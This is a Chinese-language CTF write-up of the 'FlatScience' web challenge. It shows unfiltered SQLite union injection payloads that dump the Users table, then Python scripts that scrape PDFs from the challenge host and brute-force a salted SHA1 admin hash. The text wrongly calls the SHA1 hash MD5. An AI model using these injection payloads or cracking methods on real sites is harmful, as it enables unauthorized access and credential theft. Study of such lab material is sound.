WEB:FlatScience
背景知识
sql注入
SQLite数据库知识
SQLite3注入方法
题目
用dirsearch进行扫描,下面几个关键目录:robots.txt,login.php,admin.php,剩下的目录就是一些pdf格式的论文了
一个一个访问并查看源代码,在查看login.php发现
进行代码审计
发现数据库为SQLite3
还发现输入的usr存在注入
没有任何过滤,能够拼接进数据库中执行
使用bp进行抓包拦截注入
判断字段数
输入
1' order by 3 --
再输入,回显正常,所以可知字段数为2
1' order by 2 --
判断回显
1' union select 1,2 --回显为第二位
查sql表中字段
1' union select name,sql from sqlite_master-- 
将url编码进行解码
+CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29 
得到
CREATE TABLE Users(id int primary key,name varchar(255),password varchar(255),hint varchar(255))可知字段有:id name password hint
构造查询name的payload
1' union select id, name from Users-- 
得到admin
构造查询password的payload
1' union select id, password from Users-- 
得到3fab54a50e770d830c0416df817567662a9dc85c
构造查询hint的payload
1' union select id, hint from Users--
得到 my+fav+word+in+my+fav+paper%3F%21
进行解码后得到 my fav word in my fav paper?!
经过上述操作就得到了表中的第一个数据
id=1
name=admin
password=3fab54a50e770d830c0416df817567662a9dc85c(MD5是消息摘要加密,可能会解不出来)
hint=my+fav+word+in+my+fav+paper?!(说的就是在他的论文里面)
得到ThinJerboaSalz!
获取PDF密码脚本如下:
python3爬取多目标网页PDF文件并下载到指定目录
import urllib.request
import re
import os
# open the url and read
def getHtml(url):
page = urllib.request.urlopen(url)
html = page.read()
page.close()
return html
def getUrl(html):
reg = r'(?:href|HREF)="?((?:http://)?.+?.pdf)'
url_re = re.compile(reg)
url_lst = url_re.findall(html.decode('utf-8'))
return(url_lst)
def getFile(url):
file_name = url.split('/')[-1]
u = urllib.request.urlopen(url)
f = open(file_name, 'wb')
block_sz = 8192
while True:
buffer = u.read(block_sz)
if not buffer:
break
f.write(buffer)
f.close()
print ("Sucessful to download" + " " + file_name)
#指定网页
root_url = ['http://111.198.29.45:54344/1/2/5/',
'http://111.198.29.45:54344/']
raw_url = ['http://111.198.29.45:54344/1/2/5/index.html',
'http://111.198.29.45:54344/index.html'
]
#指定目录
os.mkdir('ldf_download')
os.chdir(os.path.join(os.getcwd(), 'ldf_download'))
for i in range(len(root_url)):
print("当前网页:",root_url[i])
html = getHtml(raw_url[i])
url_lst = getUrl(html)
for url in url_lst[:]:
url = root_url[i] + url
getFile(url)
python3识别PDF内容并进行密码对冲
from io import StringIO
#python3
from pdfminer.pdfpage import PDFPage
from pdfminer.converter import TextConverter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal, LAParams
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
import sys
import string
import os
import hashlib
import importlib
import random
from urllib.request import urlopen
from urllib.request import Request
def get_pdf():
return [i for i in os.listdir("./ldf_download/") if i.endswith("pdf")]
def convert_pdf_to_txt(path_to_file):
rsrcmgr = PDFResourceManager()
retstr = StringIO()
codec = 'utf-8'
laparams = LAParams()
device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)
fp = open(path_to_file, 'rb')
interpreter = PDFPageInterpreter(rsrcmgr, device)
password = ""
maxpages = 0
caching = True
pagenos=set()
for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages, password=password,caching=caching, check_extractable=True):
interpreter.process_page(page)
text = retstr.getvalue()
fp.close()
device.close()
retstr.close()
return text
def find_password():
pdf_path = get_pdf()
for i in pdf_path:
print ("Searching word in " + i)
pdf_text = convert_pdf_to_txt("./ldf_download/"+i).split(" ")
for word in pdf_text:
sha1_password = hashlib.sha1(word.encode('utf-8')+'Salz!'.encode('utf-8')).hexdigest()
if (sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c'):
print ("Find the password :" + word)
exit()
if __name__ == "__main__":
find_password()
所以得到ThinJerboaSalz!还要去掉Salz,则密码为ThinJerboa
得到flag
参考文章链接:
【攻防世界WEB】难度四星12分进阶题:FlatScience-云社区-华为云
【愚公系列】2023年05月 攻防世界-Web(FlatScience)_愚公搬代码的博客-CSDN博客
【攻防世界】二十四 --- FlatScience --- SQLite注入_通地塔的博客-CSDN博客